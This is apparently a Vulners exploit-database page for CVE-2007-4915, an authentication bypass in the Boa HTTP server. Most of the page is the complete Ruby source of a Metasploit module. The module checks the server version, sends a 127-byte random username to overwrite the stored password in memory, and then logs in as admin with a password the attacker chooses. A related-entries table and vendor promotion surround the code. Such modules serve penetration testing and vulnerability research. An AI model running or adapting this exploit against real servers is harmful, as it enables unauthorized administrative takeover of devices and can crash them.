, Claudio "paper" Merloni , Max Dietz ">
Lucene search
K

Intersil (Boa) HTTPd Basic Authentication Password Reset

Intersil (Boa) HTTPd Basic Authentication Password Reset allows bypassing basic authentication in Boa HTTP Server 0.93.x - 0.94.11 by overwriting the password in memory with long user strings, enabling password reset and potentially causing denial-of-service

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Input Validation in Boa Boa_Webserver
3 Feb 202616:18
githubexploit
Circl
CVE-2007-4915
29 May 201815:50
circl
CVE
CVE-2007-4915
17 Sep 200717:00
cve
Cvelist
CVE-2007-4915
17 Sep 200717:00
cvelist
NVD
CVE-2007-4915
17 Sep 200717:17
nvd
Packet Storm
Intersil (Boa) HTTPd Basic Authentication Password Reset
31 Aug 202400:00
packetstorm
Prion
Cross site request forgery (csrf)
17 Sep 200717:17
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
        'Description' => %q{
          The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11
          allows basic authentication bypass when the user string is greater
          than 127 bytes long.  The long string causes the password to be
          overwritten in memory, which enables the attacker to reset the
          password.  In addition, the malicious attempt also may cause a
          denial-of-service condition.

          Please note that you must set the request URI to the directory that
          requires basic authentication in order to work properly.
        },
        'Author' => [
          'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', # original discoverer
          'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', # original discoverer
          'Max Dietz <maxwell.r.dietz[at]gmail.com>' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-4915' ],
          [ 'BID', '25676'],
          [ 'PACKETSTORM', '59347']
        ],
        'DisclosureDate' => '2007-09-10'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The request URI', '/']),
        OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })

    if (res && (m = res.headers['Server'].match(%r{Boa/(.*)})))
      vprint_status("Boa Version Detected: #{m[1]}")
      return Exploit::CheckCode::Safe if (m[1][0].ord - 48 > 0) # boa server wrong version
      return Exploit::CheckCode::Safe if (m[1][3].ord - 48 > 4)

      return Exploit::CheckCode::Vulnerable
    else
      vprint_status('Not a Boa Server!')
      return Exploit::CheckCode::Safe # not a boa server
    end
  rescue Rex::ConnectionRefused
    print_error('Connection refused by server.')
    return Exploit::CheckCode::Safe
  end

  def run
    return if check != Exploit::CheckCode::Vulnerable

    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth(Rex::Text.rand_text_alpha(127), datastore['PASSWORD'])
    })

    if res.nil?
      print_error('The server may be down')
      return
    elsif res && (res.code != 401)
      print_status("#{uri} does not have basic authentication enabled")
      return
    end

    print_status('Server still operational. Checking to see if password has been overwritten')
    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET',
      'authorization' => basic_auth('admin', datastore['PASSWORD'])
    })

    if !res
      print_error('Server timedout, will not continue')
      return
    end

    case res.code
    when 200
      print_good("Password reset successful with admin:#{datastore['PASSWORD']}")
    when 401
      print_error('Access forbidden. The password reset attempt did not work')
    else
      print_status("Unexpected response: Code #{res.code} encountered")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation